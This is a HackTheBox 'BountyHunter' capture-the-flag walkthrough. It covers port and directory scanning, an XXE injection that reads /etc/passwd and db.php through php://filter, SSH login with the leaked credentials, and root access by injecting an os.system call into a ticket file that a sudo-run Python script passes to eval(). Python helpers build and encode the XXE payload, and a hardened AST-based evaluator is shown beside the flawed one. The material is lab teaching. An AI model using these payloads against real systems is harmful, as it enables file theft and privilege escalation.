HackTheBox: BountyHunter Walkthrough
InfoGather
This is the target site; it has three sections.
Scan
Let's scan for open ports with Nmap.
Command: nmap -A 10.10.11.100
Two ports are open: 22 (SSH) and 80 (HTTP).
Let's brute-force directories on the web server with Dirb.
Command: dirb http://10.10.11.100/
Let's look at the results.
The site is written in PHP, so let's repeat the scan looking specifically for .php files.
Command: dirb http://10.10.11.100/ -X .php
We found a db.php file; keep it in mind for later.
Let's look at the traffic in Burp.
Following the link in the portal section takes us to a bug-report form. Submitting it sends a suspicious-looking blob of encoded data in the request body.
Enumeration
The data is not a hash, it is encoded: URL-decode it first, then Base64-decode it.
The result is XML that the server parses, so the site is vulnerable to XML External Entity (XXE) injection. A little research turns up ready-made payloads.
Let's choose a suitable payload.
Adapt it to the request: declare an external entity (for example pointing at file:///etc/passwd) and reference it in one of the fields the server echoes back.
Then encode it again the way the site expects, so the server accepts it: Base64 first, then URL-encode the result.
Then let's look at the response in Burp.
The response contains the leaked file, which gives us a username.
Now let's read the db.php file we found earlier.
A plain file:// entity will not work here, because the PHP source is not valid XML and the parser would choke on it; use the php://filter wrapper with convert.base64-encode so the file comes back as Base64 text.
Make the changes in the payload and re-encode it.
Let's look at the response.
Base64-decode the blob in the response.
It contains database credentials, which are worth trying elsewhere.
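The encode/decode steps above are easy to get wrong by hand (the order of URL and Base64 encoding matters). As an added example, not part of the original walkthrough, here is a small Python helper set that reverses the portal's encoding, builds the XXE payload, wraps a PHP file in php://filter, and pulls the Base64 leak out of the server's echo. The XML element names in the template, the db.php contents and the HTML response are constructed assumptions for illustration; take the real element names from the decoded request in Burp.

```python
import base64
import re
import urllib.parse

# Assumed element names: copy the real ones from the decoded request in Burp.
XXE_TEMPLATE = """<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE bugreport [
  <!ENTITY xxe SYSTEM "{resource}">
]>
<bugreport>
  <title>&xxe;</title>
  <cwe>test</cwe>
  <cvss>test</cvss>
  <reward>test</reward>
</bugreport>"""


def decode_portal_data(blob: str) -> str:
    """Reverse the portal's encoding: URL-decode first, then Base64-decode."""
    return base64.b64decode(urllib.parse.unquote(blob)).decode()


def encode_portal_data(xml: str) -> str:
    """Encode the way the portal does: Base64 first, then URL-encode the result
    so '+', '/' and '=' survive the POST body."""
    return urllib.parse.quote(base64.b64encode(xml.encode()).decode(), safe="")


def build_xxe_payload(resource: str) -> str:
    """XML declaring an external entity for `resource`, echoed back via <title>."""
    return XXE_TEMPLATE.format(resource=resource)


def php_filter_resource(path: str) -> str:
    """Wrap a PHP file in php://filter so the XML parser receives Base64 text
    instead of raw '<?php', which would break the document."""
    return "php://filter/convert.base64-encode/resource=" + path


def extract_base64_leak(response: str) -> str:
    """Find the longest Base64 run in the server's echo of our report and decode it."""
    runs = re.findall(r"[A-Za-z0-9+/]{20,}={0,2}", response)
    if not runs:
        raise ValueError("no Base64 blob found in response")
    return base64.b64decode(max(runs, key=len)).decode()


# Constructed sample data (not captured from the box): a db.php with
# placeholder credentials and a minimal HTML echo of the submitted report.
SAMPLE_DB_PHP = "<?php\n$dbuser = 'example_user';\n$dbpass = 'example_pass';\n"
SAMPLE_RESPONSE = (
    "<table><tr><td>Title:</td><td>"
    + base64.b64encode(SAMPLE_DB_PHP.encode()).decode()
    + "</td></tr><tr><td>CWE:</td><td>test</td></tr></table>"
)

if __name__ == "__main__":
    print(encode_portal_data(build_xxe_payload(php_filter_resource("db.php"))))
    print(extract_base64_leak(SAMPLE_RESPONSE))
```

Paste the printed blob into the data parameter of the intercepted request in Burp; the decoded leak is what you then read out of the response.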
Port 22 is open, so let's try the credentials over SSH.
Gaining Access
Command: ssh development@10.10.11.100
Find the user flag and submit it to HTB.
Now let’s get to the root
Command: sudo -l
Let's read the script that sudo allows us to run.
Command: cat 'Location of the file'
Reading this Python script, we learn that it asks for a file name, which must end in .md. If that condition is met, the script opens the file and checks its contents line by line: it expects specific header lines, then a ticket code line starting with **, and the expression on that line is evaluated as Python. That is where we can smuggle in our own code.
Let's write a file that satisfies the .md check and the format checks.
Command: nano test.md
# Skytrain Inc
## Ticket to
__Ticket Code:__
**200+ 24 == 224 and __import__('os').system('cat /root/root.txt') == False
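To see why this ticket works and what the fix looks like, here is an added Python example (not the walkthrough's or the box's own script): a model of the validator's checks as described above, with the dangerous eval() beside a hardened evaluator that walks the AST and only allows integer arithmetic and one comparison. The exact header strings and the "number before the first +" parsing are assumptions about the real script; the ticket in exploit_demo() is constructed and runs a harmless echo into a temp file in place of reading the root flag.

```python
import ast
import operator
import os
import tempfile


def vulnerable_evaluate(expr: str):
    """What the walkthrough exploits: the ticket-code expression hits eval()."""
    return eval(expr)


_BIN_OPS = {ast.Add: operator.add, ast.Sub: operator.sub, ast.Mult: operator.mul}
_CMP_OPS = {ast.Eq: operator.eq, ast.Gt: operator.gt, ast.Lt: operator.lt}


def safe_evaluate(expr: str):
    """Hardened replacement: whitelist integer literals, + - *, and a single
    comparison. Names, calls, attributes and boolean operators raise."""
    def ev(node):
        if isinstance(node, ast.Expression):
            return ev(node.body)
        if isinstance(node, ast.Constant) and type(node.value) is int:
            return node.value
        if isinstance(node, ast.BinOp) and type(node.op) in _BIN_OPS:
            return _BIN_OPS[type(node.op)](ev(node.left), ev(node.right))
        if (isinstance(node, ast.Compare) and len(node.ops) == 1
                and type(node.ops[0]) in _CMP_OPS):
            return _CMP_OPS[type(node.ops[0])](ev(node.left), ev(node.comparators[0]))
        raise ValueError(f"disallowed syntax: {type(node).__name__}")
    return ev(ast.parse(expr.strip(), mode="eval"))


def load_ticket(path: str):
    """The first check the walkthrough mentions: the file name must end in .md."""
    if not path.endswith(".md"):
        raise ValueError("Wrong file type.")
    with open(path) as f:
        return f.readlines()


def validate_ticket(lines, evaluator=vulnerable_evaluate):
    """Model of the format checks (assumed details: header strings and the
    requirement that the text before the first '+' is an integer)."""
    lines = [line.rstrip("\n") for line in lines]
    if not lines or not lines[0].startswith("# Skytrain Inc"):
        return False
    if len(lines) < 2 or not lines[1].startswith("## Ticket to"):
        return False
    for i, line in enumerate(lines[2:], start=2):
        if line.startswith("__Ticket Code:__") and i + 1 < len(lines):
            code_line = lines[i + 1]
            if not code_line.startswith("**"):
                return False
            expr = code_line.replace("**", "")
            int(expr.split("+")[0])  # the ticket number before '+' must parse
            return bool(evaluator(expr))
    return False


def exploit_demo():
    """Constructed ticket in the shape of test.md above, with a harmless command.
    os.system() returns exit status 0, and 0 == False is True, so the chained
    'and' stays truthy and the command runs as a side effect of validation."""
    marker = os.path.join(tempfile.mkdtemp(), "pwned")
    cmd = "echo pwned > " + marker
    ticket = [
        "# Skytrain Inc",
        "## Ticket to Root",
        "__Ticket Code:__",
        f"**200+ 24 == 224 and __import__('os').system({cmd!r}) == False",
    ]
    valid = validate_ticket(ticket)  # eval() executes the injected call
    return valid, os.path.exists(marker)


def hardened_rejects(lines) -> bool:
    """True if the AST-whitelist evaluator refuses the ticket's expression."""
    try:
        validate_ticket(lines, evaluator=safe_evaluate)
    except ValueError:
        return True
    return False


if __name__ == "__main__":
    print("vulnerable:", exploit_demo())
    print("hardened rejects it:", hardened_rejects([
        "# Skytrain Inc", "## Ticket to Root", "__Ticket Code:__",
        "**200+ 24 == 224 and __import__('os').system('true') == False"]))
```

The important design point is that the hardened version never hands attacker text to eval(): it parses the expression and refuses any node type it does not explicitly expect, so a call, an attribute lookup or an "and" chain fails closed instead of executing.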
Let's check by running the script with sudo and giving it test.md. The arithmetic part keeps the expression valid, and os.system() returns 0, which compares equal to False, so the whole line evaluates cleanly while the cat command runs as root.
Find the root flag and submit it to HTB.